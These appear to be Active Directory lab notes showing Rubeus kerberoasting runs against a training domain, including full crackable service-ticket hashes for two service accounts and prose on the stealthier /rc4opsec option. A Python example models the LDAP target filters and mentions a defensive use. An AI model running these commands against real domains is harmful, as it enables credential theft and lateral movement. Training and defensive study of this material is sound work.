C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.


[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain : dollarcorp.moneycorp.local


[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 2

[*] SamAccountName : websvc


[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*websvc$dollarcorp.moneycorp.local$SNMP/ufc-
adminsrv.dollarcorp.mone

[email protected]*$9587BC6B19255C02FA14170A6F88BF9E$EB9C059

B65FA9BCE94510BC31E88C11967EA9666ED29CBDB7325CEA6BFAEA7D053778CE0412F7CD82232A64

1D363E38EEF53A4ECE580BC393946FF1A26C0C19C2444129843783B08DD914FFC9D1706CEAAA0CA7

E716AA112195AA1B1E04F2851B0A77A87FBF79282E1210D698F3D8FE6785D71A58A48DA975797DDC

DDB5428D0149B6DC985F7C310BE21C5D7D046BE6AC15ADE71E76FAFEEDD980893212E6EBA878E026

10B4DAF7938E24BCC0A7A0322914B94CD7AA21350A228625DDA70C8A730BE9E174BA20D3948E6F80

344D18945950E537DEE26FD42B5B78EAAB904CAEE136585B9655AE640A34C334F56C825D73588F2C

39210BAF45419BDD48F4747A98EDB158C5A6057C3189D643F481F36BDE80524CCFDEFD5E9F223DFF

B811E4DC3E9EC2B58C341715B127C17FB0932CC88DED458D02E3E1A151106532A67920271E3E0946

731D336A9904BFE971C75052C43E2A892069B816A8BB9D07A7CCD96E71E69D616C5C95D4F9FEAFB8
5E8AEF0DDE28853109B7C47AE974C3023EB3623CD67078B12268664C20C3A10495BBDA9571B42D1B

62B6A8FC0397E515077F40FACEB4832211D61F91428A2F1D763DD9FD1B86C51D3DED03A1285C45DB

844FE85B3260E7681337603AA32CA4531A7117DD448D253634FC31E3B9CF01D6B74307E3A2E0021E

BF6EEDAE5CF80F799FDC95A8CF690E122BB90D00D0E66100287F725B4BB77610C609F0C47D146328

5F87BD292182924F76DA25EB4A19DE61637BF72A6AB11421D3EB88FFD87A72A5A3EE5D4100C111A3

C75B1F3DB5D810CCD044896C5A3FB8BE5E67957CD7B4B9548A38CC2A1125CF06F898D8ADE2F58E01

BF0088B1571A5E9C9E1A7643585FF42D622AD1C5E3202F3237C252DBD8BDD1767038C98B43983A14

32E9DB7695D1CC9B76651B5FB30758A8B6EDD3AD5BBC523EBB9A1769AF44A1B002487A42B503F0A5

FD78EC7D9E71399B14C4EB9031B7397082F2994D30069D88D16DAD22668CF12809F993C49144A094

66AD6320C0352B4829EE1C671B5F347FC49D2EB2048DB80B68A85E6D06982894BA188F6792CA074B

0A25ACF68602CAB5E27942885F713A7C836EE59A0BBDCA859FF6E377933EE600645AB81AB3A8D683

CCA2870D1BDF03AD0F61939EB0AB1A46F6E93EECB10995EE3F8A7E3D960E59E0B22C405F9BA1730F

263399B5A8A5AB0C3518E7FEA53291BE856068A1E1F02D04C6C1676DCCFA50F10ED507609B64704A

BD05B0484B60A14403A607074E44851DEF994AF042BBFA1B09A73A3A0D1D9E10FF33FECE43335352

645BCA44E01149FD37F7D6FC3D8215C6C432E474C24B79E7334BC008802E7FF6476BD83D39EFB097

74DDF662A917F87B2067992F82C62CFBDAB1880EA1864F53D3394A4448819E5C5DEB5500430D2BD6

DA10ABB35C1365CE847CD6B95D4DB3614E15E4EDFC675CAE7BF6FA3D13A97AB7A7C227CEC8141C44

97886EE158640F6D59FBD940E6CCE87B1129245209E6A5B0EC4CF8359DD7124E3C65D42503D5D170

F250F02DFE29854B94036E48C5441F8234846ABA6383E56424CFD0A68D62700201B61894A47B439D

F0FB5374DA29E9EF59036D7C27893BE4FC21D96A26FF6FA2DAF14D06138DD6CD27B3CF7F319F2F91

EDB4A1045406703441BC4F07FEFF5EB5A6ACEF10394CFAE9E68F1159ADC9E0971D4E40035772C046

A33697EAE03F7EE22153BD504BFDDA63C1CF9130C73C5C90331D2AE4B40F209B59F9FB186C61CCEE

9A4361B4FCF20E06D66B437B8A60A2FAAA36B470921FCE641DA2742BA9C9B3EF6E43DE8668F71662
B738A71

[*] SamAccountName : svcadmin


[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-
mgmt.dollarcorp.

moneycorp.local:[email protected]*$C093BC24478252E64098D00A18DF30C
7$84035C5367BB152D86D341BD1FD14A3F70474486422E2AA170792D501FCB19815DB7C216F30551

06AE97BC36D790D522D0F61AE707E9123E0A01C04E507169C085EBB824EF42702956579FD6CEF028

01867D8829B11FF81446A78A275971292C159C7591BDE89B9AA65355F3B6A48B6A052112D420AE2C

74A5E2B699AEAF417F8FC028814A880317ED1D3A98E1044ECD273888F7ECB452236C2B9DF2C3A002

EF73BFA6D37225C98107978CB6F62E06338FEE8A0F48702C605D38CC073093F12B16500BA525A754

F0783DB5CC11A5883E3A60C292CE0BA5F149CC4B530980C84AB5A3DFB90BF1CFF34BC62C8C821BF4

7E7E4C8FC3E1CECF16611FCA4E1D0950E4AAADA64BCE4647A458DA66AAE164B425459459AF30DD1A

23D38AE91CB61ACFC6F1A7549A7BCD3BFE3C86EF4553434E432C0F368EAE47A0461FFCF8759F8230

36938849D71EECAF93F64A513834AF0BBEDA6D155AFE86916E6868793AFDAC758A7BB17926C17A9E

B57255301B94C3BC17591F43224985B3C204B42001D133D14883E53846879EDB8725AE49FCF87508

C1F0B6E3A8DFBE504842F87BBACE0F2FE7DE9EE9EB24AF14E5F5EBB51EF4A121E259A97CC80B5E12

60E4E8E65F15D1F1323CE6A5A303ADB006B78B79E5DDECDF5C9A357C57C7444560D3403318814160

FA01F92634DC9445DCC8FE0FAEF148DB18032EBFDAD6429F0B0B6BF2E19DCB783874B9DDF3D5C5AA

5F037E7A8C6C81DD224865835164B3A2D9C66E26A0DF706AD58B028DC7034E7DB4CA08E3427FCA97

4868C0F4A6B1BABA5F1E68083BDBC407D4E512C7A1B2BCDC76C94534989F59D8DBE10E21D15F358E

2C5B0C0B05B69DC2BD78290D0F1860F19B46622F9D72471A8C7FBABE99FF885FFD96898A9FFBB604

5BED96AA9C95351999680C14DE85DA560049038B81857B9A5FDD3BF91CC891A5C8B53B01F3198409

2CE69D4ADEED66F947BCD09F75B27EA5D8930E25F859CCAFCB002E1B63167AE245BF953CC3B4E101

8E23AD890BC78F80DBA44BF02E836312EC72B312431644D5CF425D8932488D28171536467833B519

3CAC377E7AC38240C1509EA5FBC9A8FC8FD834D19C23C0CF45867D603B6ACBEFA146C09B4D6ED8E5

AF53A28314D245CFD647DF18866A0D7733319845FF9C0F146B25FEA7EB56B998E72DF61A060BF9D5

E51F82B55CBC993F99B4BF9D7AA95558574B76B8E68C46033D43F61054E131327E7E452AA12F4C1E

8C67F5EF5FE4985AE0B9ED5303D30EA0564B199C1D315707F212CCC3AD13540D5787585FCCA27473

478CA466F2AB48246F60327F46DA29F8285C1017868362E9A2840D986431A5483986C51EDA284832

519BDE9599CE82D6D4440A128081E3958CD2EB63FD03B2DC20AE20B635A60EAF750D38FE05DBC942

C658C9584F1AC291643CCC37DC2631D96FAE6AD58EC4DB0BD7F4201DE789D6168A8B829C40914BD7

D54C8818B21D0CA347A96F3C1F5988F9901F7BDD863F2473B8191F0494C54E45160F7647D884A03B

30454E4024F75FD5ED6E9CA62DA89F983502915CBF7194EC71F6F312F0F0A54C814BC9802CA83FC4

847FE2716026149BAAAC1A0E427E814185DFA173015AC86D43E066FF86B4EF23AB450C6A8F4DCF7A
A25E48ED53AFBFF1AFFEEE391FC9C2A075E2889023372E69A3E204C98C04841600832B275AD2D7D3

E0B7C7A025F743D1B313B3291DD1A61F3DBA6FA57A3A583C4A4FB7289F4BA62BFF3A8C038618CA2A

ED1022A151ECEA239B0443A4222886E6D75AA038AFC4E384996A9DC809A7F9DA60C5447FB394343A
A018A9D2D998658E

The /rc4opsec parameter of the Rubeus kerberoast command performs the Kerberoasting attack in a
stealthier manner by specifically requesting RC4-encrypted tickets. If a user account is configured to
support only AES encryption, the /rc4opsec option will not work for it, because the Kerberos protocol will
not honor requests for RC4-encrypted tickets for accounts that are set to use AES. As the output below
shows, /rc4opsec adds the clause (!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24) to the
LDAP search, so accounts with AES128 (8) or AES256 (16) set in msDS-SupportedEncryptionTypes are
filtered out before any ticket is requested.
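To make that selection logic concrete, here is an added Python example (not Rubeus code and not part of the lab notes) that re-implements the two LDAP filters printed in the Rubeus output over constructed account records. The krbtgt, websvc and svcadmin entries follow the enumeration output above; aessvc, mixedsvc, oldsvc and student163 are invented to exercise the AES-enabled, disabled and no-SPN cases. The encryption-type labels are this example's own rendering, not Rubeus's enum.

```python
"""Model the LDAP filters Rubeus prints for kerberoast and kerberoast /rc4opsec.

Added example, not Rubeus code: it re-implements the filter semantics over
constructed account records so you can see which accounts /rc4opsec keeps and
why an unset msDS-SupportedEncryptionTypes shows up as RC4_HMAC_DEFAULT.
"""
from dataclasses import dataclass, field
from typing import List, Optional

SAM_USER_OBJECT = 805306368      # samAccountType of normal user objects
UAC_ACCOUNTDISABLE = 0x0002      # userAccountControl bit both filters exclude
UAC_NORMAL_ACCOUNT = 0x0200
UAC_DONT_EXPIRE_PASSWORD = 0x10000

# msDS-SupportedEncryptionTypes bits
ETYPE_RC4_HMAC = 0x04
ETYPE_AES128 = 0x08
ETYPE_AES256 = 0x10
ETYPE_AES_ANY = ETYPE_AES128 | ETYPE_AES256   # 24, the value in the /rc4opsec clause


def ldap_bit_and(value: int, mask: int) -> bool:
    """Matching rule 1.2.840.113556.1.4.803: every bit of mask is set."""
    return value & mask == mask


def ldap_bit_or(value: int, mask: int) -> bool:
    """Matching rule 1.2.840.113556.1.4.804: at least one bit of mask is set."""
    return value & mask != 0


@dataclass
class Account:
    sam_account_name: str
    spns: List[str] = field(default_factory=list)
    uac: int = UAC_NORMAL_ACCOUNT
    sam_account_type: int = SAM_USER_OBJECT
    # None models an absent attribute, which Rubeus reports as RC4_HMAC_DEFAULT.
    supported_etypes: Optional[int] = None


def is_kerberoastable(acct: Account) -> bool:
    """(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)
         (!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"""
    return (
        acct.sam_account_type == SAM_USER_OBJECT
        and bool(acct.spns)
        and acct.sam_account_name.lower() != "krbtgt"
        and not ldap_bit_and(acct.uac, UAC_ACCOUNTDISABLE)
    )


def is_rc4_only(acct: Account) -> bool:
    """The clause /rc4opsec appends:
    (!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24)
    An absent attribute never matches the OR rule, so the negation holds:
    such accounts are selected and reported as RC4_HMAC_DEFAULT."""
    if acct.supported_etypes is None:
        return True
    return not ldap_bit_or(acct.supported_etypes, ETYPE_AES_ANY)


def supported_etypes_label(acct: Account) -> str:
    """Render the attribute roughly as Rubeus' 'Supported ETypes' line does."""
    if acct.supported_etypes is None:
        return "RC4_HMAC_DEFAULT"
    names = [("RC4_HMAC", ETYPE_RC4_HMAC),
             ("AES128_CTS_HMAC_SHA1", ETYPE_AES128),
             ("AES256_CTS_HMAC_SHA1", ETYPE_AES256)]
    return ", ".join(n for n, bit in names if acct.supported_etypes & bit) or "NONE"


def select_targets(accounts: List[Account], rc4opsec: bool = False) -> List[str]:
    """Names Rubeus would list, in input order, for the chosen mode."""
    return [a.sam_account_name for a in accounts
            if is_kerberoastable(a) and (not rc4opsec or is_rc4_only(a))]


# Constructed inventory: krbtgt, websvc and svcadmin follow the lab output;
# the remaining entries are invented to exercise the other filter clauses.
SAMPLE_ACCOUNTS = [
    Account("krbtgt", ["kadmin/changepw"], uac=UAC_NORMAL_ACCOUNT | UAC_ACCOUNTDISABLE),
    Account("websvc", ["SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL", "SNMP/ufc-adminsrv"]),
    Account("svcadmin", ["MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433"],
            uac=UAC_NORMAL_ACCOUNT | UAC_DONT_EXPIRE_PASSWORD),
    Account("aessvc", ["HTTP/aes.example.invalid"], supported_etypes=ETYPE_AES_ANY),
    Account("mixedsvc", ["HTTP/mixed.example.invalid"],
            supported_etypes=ETYPE_RC4_HMAC | ETYPE_AES_ANY),
    Account("oldsvc", ["HTTP/old.example.invalid"], uac=UAC_NORMAL_ACCOUNT | UAC_ACCOUNTDISABLE),
    Account("student163"),   # no SPN: never in scope
]

if __name__ == "__main__":
    for mode in (False, True):
        print("kerberoast" + (" /rc4opsec" if mode else ""), select_targets(SAMPLE_ACCOUNTS, rc4opsec=mode))
    for a in SAMPLE_ACCOUNTS:
        print(f"{a.sam_account_name:10} {supported_etypes_label(a)}")
```

Running it shows plain kerberoast listing four accounts while /rc4opsec drops aessvc and mixedsvc. Note that an account with no msDS-SupportedEncryptionTypes attribute at all passes the /rc4opsec clause, since the bitwise-OR matching rule cannot match an absent attribute. Inverting the same check gives a defender the list of service accounts that still need AES enabled.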
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe kerberoast /rc4opsec

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user


[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for
everything else
[*] Target Domain : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountContro
l:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 2

[*] SamAccountName : websvc


[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*websvc$DOLLARCORP.MONEYCORP.LOCAL$SNMP/ufc-
adminsrv.dollarcorp.mone

ycorp.LOCAL*$1CEAF77F9DF441C87A56C25E8ACACD48$83B84DB45C46847FB56C536F45C138CBA7

1DE165DC9BEAF1F674993044032B8BDDD7FCBA2E4FFC7703B55EA86C9E9B563E34485A28693827A8

DE210D0F332EE173B8218C6EC8374C50C250C84386B9143CD0DFFC3A130F80B94CE1A302A28830EF

5286F6DAC85878B8E5758F6E7CAE1496E19BD6531D2B13208E9316A1CC7524E2E48ED906BA8211D7
BE182F14D82C62433AC3310D9F79C627C3D1D41AC58A381D76FD7DFC9D1FE3BDA68835F5F1356244

0A6D36E62F71CDC1D79E82143AF0F98E6158B1B62BAD4FE63968DE073CE7C50C6EF6FA692427DF54

E24F61618042AE4832D25EC567DE83DD10DB3B834C2EBBBDEC4B276399F50B56FC70A743599396B6

0623CF76E0FAF3823DFA5A1E10752AA01322336A8674B64A2679A9EE7E08116E09C8593D4C5FDFD1

000BD8BF71E30DA1ECD5A14DE338A43348E09911ED43ED695F962EE3A85E4635E19D5E7B73393A78

BD392D48364817C7481EF03B7DBB64F0468D389556E68D2B399C5D4D8B3B34A7EFB9F1B5BFBC2392

2B326E0EC0C2E483D47BB920A26E23967B2DEC31AC54C3A1A2C3C4FCA6502D77CFE34AEBE19F3753

AC8BB0EBAA67237ED65AD3D9187791C096893241F523DC39F7959206A5B64EFA4497F3F090D1373B

B0A3A8146D96085820C9662A23D32A02A547A78058A1BFD933AA34ED215A0E13DDE51E775DB8979D

459A6009FAA6BADC4E1D9DA974A432906717261B2B95ABE70670115A2443138277C3B0D2B9C4C84E

996861DB2D364D03899685374257DD0FFEAA5770EE233A424109F7159BC0BF7508CF0FD7DCCF3592

489CB9D61B005531500E4ADECD22DB7035E3A69CB17F89FB8EB11C7C2C213201A9175FC89D2BFC10

796E83B6BD6CF94C8968A789EA90EF695309BD97384E0D276E4289D8631696B4DDD8E5A0866A6A6A

38EE93AA319C837549B711FC257F174C256F9D974CED2DE5CA72A17694865C3B3817C9EE881E4F3F

EAF4AEB6C130DCF089E7AB7E212A14A593E7E0C68A821DBBC90E76BE4C917513B4EBC11CF32091B4

3DBD128C482577960C1BE5532889F914A17E5ED812FEE2943B011E643A2F66469B449FBD4FADA6A8

5E1038FB5F74BBA56195F788A6714E30C1CE0E0EE4EEACE7378FDC14CF3456C9024A03464720974E

0CBD0B45896D99D330FE44C5632CC1E269C8BCA5F5EF8E68E717CEDE812E6E242890FA8FC7AFC06D

7159BB263B6F37BCB493A52B6B828FF138428E5C7EAA77B1DE228798F50C3606E41D76565885C7EB

130CCC4D0F96010A7EF66570D1261E2D8340F467D2AB5ECCF9D89BAF4377B8512581C22B3B401DD3

E9CEB210EFB32506F40AECA148089D62E11A96E4C5F0D992FC3AB3CDAA7F39851E0D6E1F3CAF2BBD

921E9A567F7660603CA3D84B4A8F00BB8221A98ECBB2FFD5404AB1501A11A34F8638617552CC50BF

CB41252A66CA02271CDDDE4C7C3A303667B1194A61B3FEBF5E711B900BD54166A1A5D899C595CF59

35A85B46CB7A914D22B09A7EBB88AEF45D1239DB46EE9027FCD5E25782E0A087A11B2CE81B2A08C1

6CCCBA228C23BCDFDB965E13A05E8F3145D9C45C0388AEE099CF34BD02BFBBA7D1A7793F40E6E557

043940975B8DD09A19DEF11A71CA85AC4C0FC39DCF5FDAE7E21257EB521624A99AE271498C1269D1
1567E76F

[*] SamAccountName : svcadmin


[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*svcadmin$DOLLARCORP.MONEYCORP.LOCAL$MSSQLSvc/dcorp-
mgmt.dollarcorp.

moneycorp.local:1433*$AA82B23CBBA1C06A0E5376E90081A01F$C450985FEA884233A3BA853A7

D9CECFC154233D4ED6D3EE58789C16FB4956D0CEB8FFC93D5AEA559A9FF3E4D0AEB8751CAE1FA7DF

6B64E3539F67A114FE96B44065E7CD5BFB2675D86A01C4038A9033CE90683C74B678BDE9FFB00030

CC688CB5A6E8E9E8793AC1FFFDFFB11F28D843B9DC18FFE76995CAEABC93787CCF6956B129090733

075A3CED5B956C5FEDE37A89AEDB8B560FE6E196398689EFBC244EC553106418A2998C3599C8B57B

92C5C2F71E05CA6AB927266D49EB51D2153F14C67E52C21C498A2EB327E446DE585CAF3040F9A64D

2083F618D227EA69585B4B65A025C3E48EB2277EF008D2E22C3C70F013CB15580C445608F365F262

C33D5734ADF2DEE78A8C7D53ACE994C40AF33EF7C976BE5F3DC5DBC0386B5F66776EED1DE2506154

246C67CB6E1924AEB27762A518D9E10CC9958FCC6A077D16F5983F1AE4D7D754EDF1C601E0D28DDF

9291DCC0C724DED27AED68A7957DBCCDA93C57A49BFDAF508D620C4C325EE5AF294027FD23A61FC5

21303008B67303258894FDDDD0100B4C1A9AF732B6B425CF1CE06A3F3377A40865AEDD2A8DD00E7D

63D48104C7CF58F2E0CD2FAD507DD719A07DE377198CB9B709AAB745B03CE0ABB8B8C4DAB60361AA

CBCE297D4717611EBD71B78486CBD7778107044C096126E63ADC4C5627D7FFFE68F5F1A5B91D4AFA

457A60564F39CCD337B81302FC5ADF9FCC58C91812C6FA61CD8982B490A4B9E9439E3ECF7DE54DF4

4B141B5A5F5073847D27E7FF598C603E2546D0064BC83CA5CFF00884ECF5E985A30A19F0792C1B78

AC0F501C91C1DABEAA36A2E8FC4C1770D5A53FB8F08AEB3293798D9B968382836236B19B65DB40EF

3A8D7E85E5141962FFB87489078AF63420EA2BB82DF5BCF90290D195D4C0264224B145439809D189

18BCC5CEA91F282E4D67CDC73F2036E1E1DD9B79A24111A62290B6CB6205D9294A9D0E0065458EC1

86A7EB839C550090AF90A0A54EFC398DBF40859B47168678EA6208A32FFC59C0218B31C5CFF6DB5E

124ED23057D9C8CE1EAFE517E3B299F0FF64D8F2C814D0BC4E7274FC9FFE7B63960782A540AF8FB2

B7FBFA5D05617B1E283DC751004A1FA3EB9AC1ADDB1833817A78301DF876607C40EC377D3DD7561D

6B4EAE3B881334056B7FC18AC3F548B62EA7AAAF0E8F73B4A652805689F317BA5921F96CD0C26032

27EC7AECE86FBAF49815CA3AD9F5C2BE1AC8339E9C717A7A7671D775D539DCD6F42FA51DBE6FE817

523B5D0FA4B72AC64DA404048F7B67E1C14FBC7D5F740CC8B4C6F932200F1D4DED8D7032D467F6AA

7F0C0FB4C24EF79994FA340E4BD8D515231A3F7933621F668322D69EBD5A22839C4F4FDF5CFB1E40

D54DE02C088EBEFC8800D879A573A1A2D116B0FF92C9001D164A073ACE0C863EC9DC51181D8F3576

9A9AFC7B37165D7BFF1ACDCAF29311841BFFF8BC1352C34B2AC880C06C67B7305FA470F245E741B9

8E1AF6FD9969871C165F1C231F67BCF3C7B4C93FE04063B859D2672A49E05734FC71A7F472FC51CB
AAD73B790044A9CBDF7AE75B62C900E57A83D8C457E4B20769D04A126ABCF7CBC0E4DCA20EE9D234

D94B5510D1E51259FC6767EB12A57A3F52EF622E80E1E344888F9B271C02FB6D5D7D55A292BA89CE
661AD4628F54D6996

Performing the attack


We will use Rubeus to request a TGS and generate the hashes.

Requesting a TGS
C:\Windows\system32>C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.


[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User : svcadmin


[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svcadmin)(!(UserAccountContr
ol:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1

$krb5tgs$23$*svcadmin$dollarcorp.moneycorp.local$MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local:[email protected]*$C093BC24478252E64098D00A18DF30C7
$84035C5367BB152D86D341BD1FD14A3F70474486422E2AA170792D501FCB19815DB7C216F3055106AE97BC36D790D522
D0F61AE707E9123E0A01C04E507169C085EBB824EF42702956579FD6CEF02801867D8829B11FF81446A78A275971292C1
59C7591BDE89B9AA65355F3B6A48B6A052112D420AE2C74A5E2B699AEAF417F8FC028814A880317ED1D3A98E1044ECD27
3888F7ECB452236C2B9DF2C3A002EF73BFA6D37225C98107978CB6F62E06338FEE8A0F48702C605D38CC073093F12B165
00BA525A754F0783DB5CC11A5883E3A60C292CE0BA5F149CC4B530980C84AB5A3DFB90BF1CFF34BC62C8C821BF47E7E4C
8FC3E1CECF16611FCA4E1D0950E4AAADA64BCE4647A458DA66AAE164B425459459AF30DD1A23D38AE91CB61ACFC6F1A75
49A7BCD3BFE3C86EF4553434E432C0F368EAE47A0461FFCF8759F823036938849D71EECAF93F64A513834AF0BBEDA6D15
5AFE86916E6868793AFDAC758A7BB17926C17A9EB57255301B94C3BC17591F43224985B3C204B42001D133D14883E5384
6879EDB8725AE49FCF87508C1F0B6E3A8DFBE504842F87BBACE0F2FE7DE9EE9EB24AF14E5F5EBB51EF4A121E259A97CC8
0B5E1260E4E8E65F15D1F1323CE6A5A303ADB006B78B79E5DDECDF5C9A357C57C7444560D3403318814160FA01F92634D
C9445DCC8FE0FAEF148DB18032EBFDAD6429F0B0B6BF2E19DCB783874B9DDF3D5C5AA5F037E7A8C6C81DD224865835164
B3A2D9C66E26A0DF706AD58B028DC7034E7DB4CA08E3427FCA974868C0F4A6B1BABA5F1E68083BDBC407D4E512C7A1B2B
CDC76C94534989F59D8DBE10E21D15F358E2C5B0C0B05B69DC2BD78290D0F1860F19B46622F9D72471A8C7FBABE99FF88
5FFD96898A9FFBB6045BED96AA9C95351999680C14DE85DA560049038B81857B9A5FDD3BF91CC891A5C8B53B01F319840
92CE69D4ADEED66F947BCD09F75B27EA5D8930E25F859CCAFCB002E1B63167AE245BF953CC3B4E1018E23AD890BC78F80
DBA44BF02E836312EC72B312431644D5CF425D8932488D28171536467833B5193CAC377E7AC38240C1509EA5FBC9A8FC8
FD834D19C23C0CF45867D603B6ACBEFA146C09B4D6ED8E5AF53A28314D245CFD647DF18866A0D7733319845FF9C0F146B
25FEA7EB56B998E72DF61A060BF9D5E51F82B55CBC993F99B4BF9D7AA95558574B76B8E68C46033D43F61054E131327E7
E452AA12F4C1E8C67F5EF5FE4985AE0B9ED5303D30EA0564B199C1D315707F212CCC3AD13540D5787585FCCA27473478C
A466F2AB48246F60327F46DA29F8285C1017868362E9A2840D986431A5483986C51EDA284832519BDE9599CE82D6D4440
A128081E3958CD2EB63FD03B2DC20AE20B635A60EAF750D38FE05DBC942C658C9584F1AC291643CCC37DC2631D96FAE6A
D58EC4DB0BD7F4201DE789D6168A8B829C40914BD7D54C8818B21D0CA347A96F3C1F5988F9901F7BDD863F2473B8191F0
494C54E45160F7647D884A03B30454E4024F75FD5ED6E9CA62DA89F983502915CBF7194EC71F6F312F0F0A54C814BC980
2CA83FC4847FE2716026149BAAAC1A0E427E814185DFA173015AC86D43E066FF86B4EF23AB450C6A8F4DCF7AA25E48ED5
3AFBFF1AFFEEE391FC9C2A075E2889023372E69A3E204C98C04841600832B275AD2D7D3E0B7C7A025F743D1B313B3291D
D1A61F3DBA6FA57A3A583C4A4FB7289F4BA62BFF3A8C038618CA2AED1022A151ECEA239B0443A4222886E6D75AA038AFC
4E384996A9DC809A7F9DA60C5447FB394343AA018A9D2D998658E

We can also specifically request a TGS using RC4 encryption only. If the account has AES enabled, however,
this will not work.
C:\Windows\system32>C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user


[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for
everything else
[*] Target User : svcadmin
[*] Target Domain : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-
dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for
'(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svcadmin)(!(UserAccountContr
ol:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 1

$krb5tgs$23$*svcadmin$DOLLARCORP.MONEYCORP.LOCAL$MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local:1433*$3C2E3BD874DA5BED14ABF5F25E8875BB$BD4B4B4A576518D0F5C7E1303E
C69FCCDA3DA61E4DDA54C96A49F6488F9888C5129A1512EF9E2681081D70A3D8F4595B454BDBC40E0EDBF7888B00472E7
98D7AAFA25E1F27C13641C423412375773CCC2B4FF32D2AE0BC994447EFD9B1EE7DA3A431F083832A31718706B69D28BF
B9D5F2810D4B5E446CE8386E0FD48F66065314C7F654B12E0272DBCC034A29A5A681A13F908E136D9B2177245BFF4C0AD
05620C0C3D6CC7C5B4AA9E173096A97562894242DC329EE7C9171FD2C3CEBD3D8D9266E9B5592AF75C33DCBB074CD5506
FCBF32A1726FCBF32E12390F0BB8F49B1C8486C7C0631B3D344037D8BA3ED86D199311E5C9AAFEEE09783337C59C214BC
9B2686F6FAFB582EBD80B641BFB3F97B9338FD9835A858A8813F111ADBD96A3E2BD1D64753EF4FA87531097449324944A
22E7D1208460C80E4B4CB0478A10EEBEB7D9553D958B0DBF6D100E62D6885A96F9FBB4A9BE5BE786F10E29867CC9A0CE0
0477868B239C03C512D13AFDA5110A99D2ED88710A507DCDE6AC88188ADDB5C462242C1E548AC83E876108EAFB12074E5
